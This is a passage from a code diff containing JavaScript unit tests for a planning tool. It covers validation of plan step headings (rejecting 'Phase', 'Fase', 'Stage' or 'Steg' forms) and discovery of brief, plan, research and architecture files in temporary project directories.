const f = findForbiddenHeadings(FORBIDDEN_FASE);
assert.equal(f.length, 2);
assert.match(f[0].raw, /Fase 1/);
});
test('findForbiddenHeadings — Phase (English)', () => {
const f = findForbiddenHeadings(FORBIDDEN_PHASE);
assert.equal(f.length, 1);
});
test('findForbiddenHeadings — Stage', () => {
assert.equal(findForbiddenHeadings(FORBIDDEN_STAGE).length, 1);
});
test('findForbiddenHeadings — Steg (Norwegian variant)', () => {
assert.equal(findForbiddenHeadings(FORBIDDEN_STEG).length, 1);
});
test('findForbiddenHeadings — clean plan has zero', () => {
assert.equal(findForbiddenHeadings(GOOD_PLAN).length, 0);
});
test('sliceSteps — body bounded by next step', () => {
const sections = sliceSteps(GOOD_PLAN);
assert.equal(sections.length, 3);
assert.match(sections[0].body, /First step/);
assert.match(sections[0].body, /Files: a\.ts/);
assert.ok(!sections[0].body.includes('Second step'));
});
test('validatePlanHeadings — strict accepts good plan', () => {
const r = validatePlanHeadings(GOOD_PLAN, { strict: true });
assert.equal(r.valid, true);
assert.equal(r.parsed.steps.length, 3);
});
test('validatePlanHeadings — strict rejects forbidden Fase form', () => {
const r = validatePlanHeadings(FORBIDDEN_FASE, { strict: true });
assert.equal(r.valid, false);
assert.ok(r.errors.find(e => e.code === 'PLAN_FORBIDDEN_HEADING'));
});
test('validatePlanHeadings — soft mode demotes forbidden to warning', () => {
const r = validatePlanHeadings(`### Step 1: ok\n\n### Phase 2: drift\n`, { strict: false });
assert.equal(r.errors.find(e => e.code === 'PLAN_FORBIDDEN_HEADING'), undefined);
assert.ok(r.warnings.find(w => w.code === 'PLAN_FORBIDDEN_HEADING'));
});
test('validatePlanHeadings — non-contiguous numbering is an error', () => {
const broken = '### Step 1: ok\ncontent\n\n### Step 3: skip\ncontent\n';
const r = validatePlanHeadings(broken, { strict: true });
assert.equal(r.valid, false);
assert.ok(r.errors.find(e => e.code === 'PLAN_STEP_NUMBERING'));
});
test('validatePlanHeadings — empty plan errors with PLAN_NO_STEPS', () => {
const r = validatePlanHeadings('## Implementation Plan\n\nno steps\n');
assert.ok(r.errors.find(e => e.code === 'PLAN_NO_STEPS'));
});
test('extractPlanVersion — from frontmatter', () => {
assert.equal(extractPlanVersion('plan_version: "1.7"\nfoo: bar\n'), '1.7');
assert.equal(extractPlanVersion('plan_version: 1.8\n'), '1.8');
});
test('extractPlanVersion — null when absent', () => {
assert.equal(extractPlanVersion('foo: bar\n'), null);
});

View file

@ -0,0 +1,106 @@
import { test } from 'node:test';
import { strict as assert } from 'node:assert';
import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from 'node:fs';
import { tmpdir } from 'node:os';
import { join } from 'node:path';
import {
discoverProject,
checkPhaseRequirements,
} from '../../lib/parsers/project-discovery.mjs';
function setupProject(structure) {
const root = mkdtempSync(join(tmpdir(), 'ultraplan-disc-'));
for (const [path, content] of Object.entries(structure)) {
const full = join(root, path);
mkdirSync(join(full, '..'), { recursive: true });
writeFileSync(full, content);
}
return root;
}
test('discoverProject — finds brief, plan, progress at root', () => {
const root = setupProject({
'brief.md': 'b',
'plan.md': 'p',
'progress.json': '{}',
});
try {
const a = discoverProject(root);
assert.equal(a.brief, join(root, 'brief.md'));
assert.equal(a.plan, join(root, 'plan.md'));
assert.equal(a.progress, join(root, 'progress.json'));
} finally {
rmSync(root, { recursive: true, force: true });
}
});
test('discoverProject — research files sorted by name', () => {
const root = setupProject({
'brief.md': 'b',
'research/03-third.md': 't',
'research/01-first.md': 'f',
'research/02-second.md': 's',
});
try {
const a = discoverProject(root);
assert.equal(a.research.length, 3);
assert.match(a.research[0], /01-first/);
assert.match(a.research[1], /02-second/);
assert.match(a.research[2], /03-third/);
} finally {
rmSync(root, { recursive: true, force: true });
}
});
test('discoverProject — architecture overview + gaps detected', () => {
const root = setupProject({
'brief.md': 'b',
'architecture/overview.md': 'o',
'architecture/gaps.md': 'g',
});
try {
const a = discoverProject(root);
assert.match(a.architecture.overview, /architecture\/overview\.md$/);
assert.match(a.architecture.gaps, /architecture\/gaps\.md$/);
assert.equal(a.architecture.looseFiles.length, 0);
} finally {
rmSync(root, { recursive: true, force: true });
}
});
test('discoverProject — loose architecture files surfaced for drift detection', () => {
const root = setupProject({
'architecture/overview.md': 'o',
'architecture/random-note.md': 'x',
});
try {
const a = discoverProject(root);
assert.equal(a.architecture.looseFiles.length, 1);
assert.match(a.architecture.looseFiles[0], /random-note/);
} finally {
rmSync(root, { recursive: true, force: true });
}
});
test('discoverProject — missing project dir returns empty artifacts', () => {
const a = discoverProject('/nonexistent/path/unlikely');
assert.equal(a.brief, null);
assert.equal(a.research.length, 0);
});
test('checkPhaseRequirements — research needs brief', () => {
const r = checkPhaseRequirements({ brief: null }, 'research');
assert.equal(r.valid, false);
assert.ok(r.errors.find(e => e.code === 'PROJECT_NO_BRIEF'));
});
test('checkPhaseRequirements — execute needs plan', () => {
const r = checkPhaseRequirements({ brief: 'x', plan: null }, 'execute');
assert.equal(r.valid, false);
assert.ok(r.errors.find(e => e.code === 'PROJECT_NO_PLAN'));
});
test('checkPhaseRequirements — happy path', () => {
const r = checkPhaseRequirements({ brief: 'x', plan: 'y' }, 'plan');
assert.equal(r.valid, true);
});